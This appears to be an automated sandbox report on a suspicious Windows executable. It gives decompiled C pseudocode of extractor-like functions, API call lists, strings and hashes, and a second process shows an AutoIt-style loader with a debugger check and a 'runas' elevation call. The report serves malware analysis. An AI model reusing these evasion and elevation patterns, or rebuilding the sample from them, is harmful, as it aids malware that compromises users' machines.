          														__eflags = _t169 -  &(_t154[1]);
          														if(_t169 ==  &(_t154[1])) {
          															goto L47;
          														} else {
          															_push(_t213);
          															_push(0);
          															_push(0);
          															_push(_t154);
          															L28();
          														}
          													}
          													L58:
          													__eflags = _v16 ^ _t221;
          													return E0020E203(_t124, _v16 ^ _t221);
          												} else {
          													goto L34;
          												}
          											}
          										} else {
          											_t138 = 0xc;
          											L36:
          											return _t138;
          										}
          									} else {
          										goto L22;
          									}
          									goto L68;
          									L22:
          									_t195 = _v16;
          									 *((intOrPtr*)(_v24 + _t198)) = _t195;
          									_t198 = _t198 + 4;
          									_t191 = _t195 + _v12;
          									_v16 = _t195 + _v12;
          									__eflags = _t198 - _t150;
          								} while (_t198 != _t150);
          								goto L23;
          							}
          						} else {
          							_t199 = _t198 | 0xffffffff;
          							L24:
          							E00217A50(0);
          							goto L25;
          						}
          					} else {
          						while(1) {
          							_v8 = 0x3f2a;
          							_v6 = _t159;
          							_t146 = E0021DD80( *_t207,  &_v8);
          							__eflags = _t146;
          							if(_t146 != 0) {
          								_push( &_v36);
          								_push(_t146);
          								_push( *_t207);
          								L38();
          								_t223 = _t223 + 0xc;
          							} else {
          								_t146 =  &_v36;
          								_push(_t146);
          								_push(0);
          								_push(0);
          								_push( *_t207);
          								L28();
          								_t223 = _t223 + 0x10;
          							}
          							_t199 = _t146;
          							__eflags = _t199;
          							if(_t199 != 0) {
          								break;
          							}
          							_t207 = _t207 + 4;
          							_t159 = 0;
          							__eflags =  *_t207;
          							if( *_t207 != 0) {
          								continue;
          							} else {
          								_t150 = _v336.cAlternateFileName;
          								_t198 = _v36;
          								goto L9;
          							}
          							goto L68;
          						}
          						L25:
          						E0021A1ED( &_v36);
          						_t91 = _t199;
          						goto L26;
          					}
          				} else {
          					_t147 = E00217ECC();
          					_t218 = 0x16;
          					 *_t147 = _t218;
          					E00217DAB();
          					_t91 = _t218;
          					L26:
          					return _t91;
          				}
          				L68:
          			}

          APIs
          • _free.LIBCMT ref: 00219FAF
            • Part of subcall function 00217DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00217DAA,0000002C,0022A968,0021AF68,00000000,00000000,00218599,?,?,00217DB7,00000000,00000000,00000000,00000000,00000000), ref: 00217DBD
            • Part of subcall function 00217DBB: GetCurrentProcess.KERNEL32(C0000417,0022A968,0000002C,00217AE8,00000016,00218599), ref: 00217DDF
            • Part of subcall function 00217DBB: TerminateProcess.KERNEL32(00000000), ref: 00217DE6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
          • String ID: *?$.
          • API String ID: 2667617558-3972193922
          • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
          • Instruction ID: 7fa99923dda06a75c407c81f97f7b4ea4f0d7e8ad6d4550565231e2a8fa5e65f
          • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
          • Instruction Fuzzy Hash: 0E51B575E1020AAFDF14CFA8C881AEDB7F5FFA8310F244169E454E7741E6719E928B50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 80%
          			E001F7570(void* __ecx, void* __edx) {
          				void* __esi;
          				char _t54;
          				signed int _t57;
          				void* _t61;
          				signed int _t62;
          				signed int _t68;
          				signed int _t85;
          				void* _t90;
          				void* _t99;
          				void* _t101;
          				intOrPtr* _t106;
          				void* _t108;
          
          				_t99 = __edx;
          				E0020D870(E00221298, _t108);
          				E0020D940();
          				_t106 =  *((intOrPtr*)(_t108 + 0xc));
          				if( *_t106 == 0) {
          					L3:
          					_t101 = 0x802;
          					E001FFAB1(_t108 - 0x1010, _t106, 0x802);
          					L4:
          					_t81 =  *((intOrPtr*)(_t108 + 8));
          					E001F7773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
          					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
          					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
          						__eflags =  *((char*)(_t108 + 0x10));
          						if(__eflags == 0) {
          							E001FFA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
          							E001F6EF9(_t108 - 0x307c);
          							_push(0);
          							_t54 = E001FA1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
          							_t85 =  *(_t108 - 0x2074);
          							 *((char*)(_t108 + 0x13)) = _t54;
          							__eflags = _t85 & 0x00000001;
          							if((_t85 & 0x00000001) != 0) {
          								__eflags = _t85 & 0xfffffffe;
          								E001FA12F(_t106, _t85 & 0xfffffffe);
          							}
          							E001F943C(_t108 - 0x2034);
          							 *((intOrPtr*)(_t108 - 4)) = 1;
          							_t57 = E001F9BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
          							__eflags = _t57;
          							if(_t57 != 0) {
          								_push(0);
          								_push(_t108 - 0x2034);
          								_push(0);
          								_t68 = E001F399D(_t81, _t99);
          								__eflags = _t68;
          								if(_t68 != 0) {
          									E001F94DA(_t108 - 0x2034);
          								}
          							}
          							E001F943C(_t108 - 0x50a0);
          							__eflags =  *((char*)(_t108 + 0x13));
          							 *((char*)(_t108 - 4)) = 2;
          							if( *((char*)(_t108 + 0x13)) != 0) {
          								_t62 = E001F9768(_t108 - 0x50a0, _t106, _t106, 5);
          								__eflags = _t62;
          								if(_t62 != 0) {
          									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
          								}
          							}
          							E001FA12F(_t106,  *(_t108 - 0x2074));
          							E001F946E(_t108 - 0x50a0);
          							_t90 = _t108 - 0x2034;
          						} else {
          							E001F943C(_t108 - 0x60c4);
          							_push(1);
          							_push(_t108 - 0x60c4);
          							_push(0);
          							 *((intOrPtr*)(_t108 - 4)) = 0;
          							E001F399D(_t81, _t99);
          							_t90 = _t108 - 0x60c4;
          						}
          						_t61 = E001F946E(_t90);
          					} else {
          						E001F6BF5(_t113, 0x53, _t81 + 0x1e, _t106);
          						_t61 = E001F6E03(0x2300e0, 3);
          					}
          					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
          					return _t61;
          				}
          				_t112 =  *((intOrPtr*)(_t106 + 2));
          				if( *((intOrPtr*)(_t106 + 2)) != 0) {
          					goto L3;
          				} else {
          					_t101 = 0x802;
          					E001FFAB1(_t108 - 0x1010, 0x222490, 0x802);
          					E001FFA89(_t112, _t108 - 0x1010, _t106, 0x802);
          					goto L4;
          				}
          			}

          APIs
          • __EH_prolog.LIBCMT ref: 001F7575
          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F7711
            • Part of subcall function 001FA12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA143
            • Part of subcall function 001FA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA174
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: File$Attributes$H_prologTime
          • String ID: :
          • API String ID: 1861295151-336475711
          • Opcode ID: 86206cc83100b51a9b8691352df07e822cba538373486a3d2254a06a8911aa92
          • Instruction ID: ef9db526174b40e023a5828a9727302f5151bd4f84cdf6387f738c92602e94a1
          • Opcode Fuzzy Hash: 86206cc83100b51a9b8691352df07e822cba538373486a3d2254a06a8911aa92
          • Instruction Fuzzy Hash: 394190B180521CAADB25EB64DD59EFE737CAF64300F4041A9B709A3092DB745F89CFA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 81%
          			E001FB32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
          				short _v4096;
          				short _v4100;
          				signed short* _t30;
          				long _t32;
          				short _t33;
          				void* _t39;
          				signed short* _t52;
          				void* _t53;
          				signed short* _t62;
          				void* _t66;
          				intOrPtr _t69;
          				signed short* _t71;
          				intOrPtr _t73;
          
          				E0020D940();
          				_t71 = _a4;
          				if( *_t71 != 0) {
          					E001FB4C6(_t71);
          					_t66 = E00212B33(_t71);
          					_t30 = E001FB4F2(_t71);
          					__eflags = _t30;
          					if(_t30 == 0) {
          						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
          						__eflags = _t32;
          						if(_t32 == 0) {
          							L22:
          							_t33 = 0;
          							__eflags = 0;
          							L23:
          							goto L24;
          						}
          						__eflags = _t32 - 0x7ff;
          						if(_t32 > 0x7ff) {
          							goto L22;
          						}
          						__eflags = E001FB5CD( *_t71 & 0x0000ffff);
          						if(__eflags == 0) {
          							E001FAEA5(__eflags,  &_v4100, 0x800);
          							_t39 = E00212B33( &_v4100);
          							_t69 = _a12;
          							__eflags = _t69 - _t39 + _t66 + 4;
          							if(_t69 <= _t39 + _t66 + 4) {
          								goto L22;
          							}
          							E001FFAB1(_a8, L"\\\\?\\", _t69);
          							E001FFA89(__eflags, _a8,  &_v4100, _t69);
          							__eflags =  *_t71 - 0x2e;
          							if(__eflags == 0) {
          								__eflags = E001FB5CD(_t71[1] & 0x0000ffff);
          								if(__eflags != 0) {
          									_t71 =  &(_t71[2]);
          									__eflags = _t71;
          								}
          							}
          							L19:
          							_push(_t69);
          							L20:
          							_push(_t71);
          							L21:
          							_push(_a8);
          							E001FFA89(__eflags);
          							_t33 = 1;
          							goto L23;
          						}
          						_t13 = _t66 + 6; // 0x6
          						_t69 = _a12;
          						__eflags = _t69 - _t13;
          						if(_t69 <= _t13) {
          							goto L22;
          						}
          						E001FFAB1(_a8, L"\\\\?\\", _t69);
          						_v4096 = 0;
          						E001FFA89(__eflags, _a8,  &_v4100, _t69);
          						goto L19;
          					}
          					_t52 = E001FB4C6(_t71);
          					__eflags = _t52;
          					if(_t52 == 0) {
          						_t53 = 0x5c;
          						__eflags =  *_t71 - _t53;
          						if( *_t71 != _t53) {
          							goto L22;
          						}
          						_t62 =  &(_t71[1]);
          						__eflags =  *_t62 - _t53;
          						if( *_t62 != _t53) {
          							goto L22;
          						}
          						_t73 = _a12;
          						_t9 = _t66 + 6; // 0x6
          						__eflags = _t73 - _t9;
          						if(_t73 <= _t9) {
          							goto L22;
          						}
          						E001FFAB1(_a8, L"\\\\?\\", _t73);
          						E001FFA89(__eflags, _a8, L"UNC", _t73);
          						_push(_t73);
          						_push(_t62);
          						goto L21;
          					}
          					_t2 = _t66 + 4; // 0x4
          					__eflags = _a12 - _t2;
          					if(_a12 <= _t2) {
          						goto L22;
          					}
          					E001FFAB1(_a8, L"\\\\?\\", _a12);
          					_push(_a12);
          					goto L20;
          				} else {
          					_t33 = 0;
          					L24:
          					return _t33;
          				}
          			}

















          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: UNC$\\?\
          • API String ID: 0-253988292
          • Opcode ID: ccb6bde474b463f357084d3c401e3c354dd91654fadac3e07582990282b0a3b7
          • Instruction ID: 952a2ea85fe6024644f71142fa70d04b8f27e53c4cfbf26d136b5849adda17f4
          • Opcode Fuzzy Hash: ccb6bde474b463f357084d3c401e3c354dd91654fadac3e07582990282b0a3b7
          • Instruction Fuzzy Hash: 1E41E33140821CBACF21AF60DD81EFB37ADAF15355F048465FB1993242D7B49AA5DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 70%
          			E00208A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
          				void* __esi;
          				intOrPtr _t18;
          				char _t19;
          				intOrPtr* _t23;
          				signed int _t25;
          				void* _t26;
          				intOrPtr* _t28;
          				void* _t38;
          				void* _t43;
          				intOrPtr _t44;
          				signed int* _t48;
          
          				_t44 = _a4;
          				_t43 = __ecx;
          				 *((intOrPtr*)(__ecx + 4)) = _t44;
          				_t18 = E0020D82C(__edx, _t44, __eflags, 0x30);
          				_a4 = _t18;
          				if(_t18 == 0) {
          					_t19 = 0;
          					__eflags = 0;
          				} else {
          					_t19 = E002083B5(_t18);
          				}
          				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
          				if(_t19 == 0) {
          					return _t19;
          				} else {
          					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
          					E00209184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
          					E0020931D( *((intOrPtr*)(_t43 + 0xc)), 1);
          					E002092D3( *((intOrPtr*)(_t43 + 0xc)), 1);
          					_t23 = E00209238( *((intOrPtr*)(_t43 + 0xc)));
          					_t28 = _t23;
          					if(_t28 == 0) {
          						L7:
          						__eflags =  *(_t43 + 0x10);
          						if( *(_t43 + 0x10) != 0) {
          							E00208581(_t43);
          							_t25 =  *(_t43 + 0x10);
          							_push(0);
          							_push(0);
          							_push(0);
          							 *((char*)(_t43 + 0x25)) = 0;
          							_t38 =  *_t25;
          							_push(0);
          							__eflags =  *(_t43 + 0x20);
          							if( *(_t43 + 0x20) == 0) {
          								_push(L"about:blank");
          							} else {
          								_push( *(_t43 + 0x20));
          							}
          							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
          						}
          						L12:
          						return _t23;
          					}
          					_t10 = _t43 + 0x10; // 0x10
          					_t48 = _t10;
          					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0x22412c, _t48);
          					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
          					if(_t26 >= 0) {
          						goto L7;
          					}
          					 *_t48 =  *_t48 & 0x00000000;
          					goto L12;
          				}
          			}















          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: Shell.Explorer$about:blank
          • API String ID: 0-874089819
          • Opcode ID: 3b676418b013a7cfb5656264ecb45f899a55e8c0759c10ec339a3b3718933347
          • Instruction ID: fe6ff2a4b6962aa2b1338210fde6093e6005e0985cfad53f9c80c570a5368b41
          • Opcode Fuzzy Hash: 3b676418b013a7cfb5656264ecb45f899a55e8c0759c10ec339a3b3718933347
          • Instruction Fuzzy Hash: 68214C71720716BFD704DFA4C891A27B768BB45710B04811AB6568BAC3DFB0E871CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 75%
          			E001F12D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
          				struct HWND__* _t20;
          				struct HWND__* _t21;
          
          				if(_a8 == 0x30) {
          					E001FD6E4(0x230078, _a4);
          				} else {
          					_t27 = _a8 - 0x110;
          					if(_a8 == 0x110) {
          						E001FD70B(0x230078, _t27, _a4, _a20, _a28 & 1);
          						if((_a28 & 0x00000001) != 0) {
          							_t20 =  *0x22dfd4(_a4);
          							if(_t20 != 0) {
          								_t21 = GetDlgItem(_t20, 0x3021);
          								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
          									SetWindowTextW(_t21, 0x2222e4);
          								}
          							}
          						}
          					}
          				}
          				return 0;
          			}






          APIs
            • Part of subcall function 001FD70B: _swprintf.LIBCMT ref: 001FD731
            • Part of subcall function 001FD70B: _strlen.LIBCMT ref: 001FD752
            • Part of subcall function 001FD70B: SetDlgItemTextW.USER32(?,0022D154,?), ref: 001FD7B2
            • Part of subcall function 001FD70B: GetWindowRect.USER32(?,?), ref: 001FD7EC
            • Part of subcall function 001FD70B: GetClientRect.USER32(?,?), ref: 001FD7F8
          • GetDlgItem.USER32(00000000,00003021), ref: 001F131B
          • SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ItemRectTextWindow$Client_strlen_swprintf
          • String ID: 0
          • API String ID: 2622349952-4108050209
          • Opcode ID: 8611fc48f37c4e089fe24aa557932e5dde6ce0dfc803f989d9c7a24f6dd4d72a
          • Instruction ID: da24141e886f20bfad53a17caa88d331c0d571d0b7bed232da204b9c4187c895
          • Opcode Fuzzy Hash: 8611fc48f37c4e089fe24aa557932e5dde6ce0dfc803f989d9c7a24f6dd4d72a
          • Instruction Fuzzy Hash: A8F0C2B458025CF7DF291F60AC5DBF93B5ABF14364F008014FE49958A1C779C995EB24
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 79%
          			E002004BA(void* __ecx, void* __ebp, void* _a4) {
          				void* __esi;
          				long _t2;
          				void* _t6;
          
          				_t6 = __ecx;
          				_t2 = WaitForSingleObject(_a4, 0xffffffff);
          				if(_t2 == 0xffffffff) {
          					_push(GetLastError());
          					return E001F6CC9(E001F6CCE(_t6, 0x2300e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x2300e0, 0x2300e0, 2);
          				}
          				return _t2;
          			}







          APIs
          • WaitForSingleObject.KERNEL32(?,000000FF,002005D9,?,?,0020064E,?,?,?,?,?,00200638), ref: 002004C0
          • GetLastError.KERNEL32(?,?,0020064E,?,?,?,?,?,00200638), ref: 002004CC
            • Part of subcall function 001F6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F6CEC
          Strings
          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002004D5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
          • String ID: WaitForMultipleObjects error %d, GetLastError %d
          • API String ID: 1091760877-2248577382
          • Opcode ID: b7ae7b6b2973a52533a49a6103244f4a7c1d1ce9bb6da0cc9f9e2b13fad81cfa
          • Instruction ID: e33597b921d33aa7f5848d4718cea3e98bf5705fecd263b219cb3dbaf926dd56
          • Opcode Fuzzy Hash: b7ae7b6b2973a52533a49a6103244f4a7c1d1ce9bb6da0cc9f9e2b13fad81cfa
          • Instruction Fuzzy Hash: 85D02E31428832B7D61023647D0EEBE38058B22330F608308F275602EACB220EA682E6
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001FD6C1(void* __ecx) {
          				struct HRSRC__* _t3;
          				void* _t5;
          
          				_t5 = __ecx;
          				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
          				if(_t3 != 0) {
          					 *((char*)(_t5 + 0x64)) = 1;
          					return _t3;
          				}
          				return _t3;
          			}






          APIs
          • GetModuleHandleW.KERNEL32(00000000,?,001FCFBE,?), ref: 001FD6C6
          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,001FCFBE,?), ref: 001FD6D4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: FindHandleModuleResource
          • String ID: RTL
          • API String ID: 3537982541-834975271
          • Opcode ID: 55d94236e2241af3c7f12e90eda6e63dcb2ea13e0409308904539c82cf287371
          • Instruction ID: 40d69448c77e36c534feca1d9774e0cf5f76786f70f4997a38a665ecb3a78328
          • Opcode Fuzzy Hash: 55d94236e2241af3c7f12e90eda6e63dcb2ea13e0409308904539c82cf287371
          • Instruction Fuzzy Hash: FAC01231241311B6D73017B07C0DF6329496B11B11F551448B245D91D0DAA6C449C651
          Uniqueness

          Uniqueness Score: -1.00%

          Executed Functions

          APIs
          • _wcslen.LIBCMT ref: 01139911
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 0113995C
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 011399A3
          • _memmove.LIBCMT ref: 01139FE6
          • _memmove.LIBCMT ref: 0113A914
          • _memmove.LIBCMT ref: 01159769
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
          • String ID:
          • API String ID: 2383988440-0
          • Opcode ID: 3b06908abc9dd4d8b97ca6fdb746be993cc2cc4231fe931ca2507abdcc58751b
          • Instruction ID: 8b3c5ad186125f3198103d810390e21f27280a6571696ed7c35a14f10b707f8c
          • Opcode Fuzzy Hash: 3b06908abc9dd4d8b97ca6fdb746be993cc2cc4231fe931ca2507abdcc58751b
          • Instruction Fuzzy Hash: 3E13AF70608341DFD72CDF28D480A2ABBE5BF89308F14896DE996CB359D771E845CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 01133681
          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 01133697
          • __wsplitpath.LIBCMT ref: 011336C2
            • Part of subcall function 0114392E: __wsplitpath_helper.LIBCMT ref: 01143970
          • _wcscpy.LIBCMT ref: 011336D7
          • _wcscat.LIBCMT ref: 011336EC
          • SetCurrentDirectoryW.KERNELBASE(?), ref: 011336FC
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
            • Part of subcall function 01133D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0113378C,?,?,?,00000010), ref: 01133D38
            • Part of subcall function 01133D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 01133D71
          • _wcscpy.LIBCMT ref: 011337D0
          • _wcslen.LIBCMT ref: 01133853
          • _wcslen.LIBCMT ref: 011338AD
          Strings
          • _, xrefs: 0113394C
          • Error opening the file, xrefs: 011581AF
          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0115817E
          • Unterminated string, xrefs: 011582C6
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
          • API String ID: 3393021363-188983378
          • Opcode ID: 8f3c684266aac361d26072462edbb9ff4c519185cf68e2e1fb1e8cd841bf89ca
          • Instruction ID: d0602824b5205907b2ed4cd40d4cd302566f6027966b2f94763aefca11376ef6
          • Opcode Fuzzy Hash: 8f3c684266aac361d26072462edbb9ff4c519185cf68e2e1fb1e8cd841bf89ca
          • Instruction Fuzzy Hash: F6D1CFB1518342AAD719EF68C880AAFB7E8BFD5704F04492DE9D547200EB74D649CBA3
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0113D7BA
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 01132262
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 01132278
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 0113228E
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 011322A4
            • Part of subcall function 01132190: _wcscpy.LIBCMT ref: 011322C4
          • IsDebuggerPresent.KERNEL32 ref: 0113D7C6
          • GetFullPathNameW.KERNEL32(C:\Users\user\77066510\txoxpdjc.qnr,00000104,?,011D7F50,011D7F54), ref: 0113D82D
            • Part of subcall function 011316A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 011316E5
          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0113D8A2
          • MessageBoxA.USER32 ref: 0115E14F
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0115E1A3
          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0115E1D3
          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0115E21D
          • ShellExecuteW.SHELL32(00000000), ref: 0115E224
            • Part of subcall function 011403E0: GetSysColorBrush.USER32(0000000F), ref: 011403EB
            • Part of subcall function 011403E0: LoadCursorW.USER32(00000000,00007F00), ref: 011403FA
            • Part of subcall function 011403E0: LoadIconW.USER32 ref: 01140410
            • Part of subcall function 011403E0: LoadIconW.USER32 ref: 01140423
            • Part of subcall function 011403E0: LoadIconW.USER32 ref: 01140436
            • Part of subcall function 011403E0: LoadImageW.USER32 ref: 0114045E
            • Part of subcall function 011403E0: RegisterClassExW.USER32 ref: 011404AD
            • Part of subcall function 01140350: CreateWindowExW.USER32 ref: 01140385
            • Part of subcall function 01140350: CreateWindowExW.USER32 ref: 011403AE
            • Part of subcall function 01140350: ShowWindow.USER32(?,00000000), ref: 011403C4
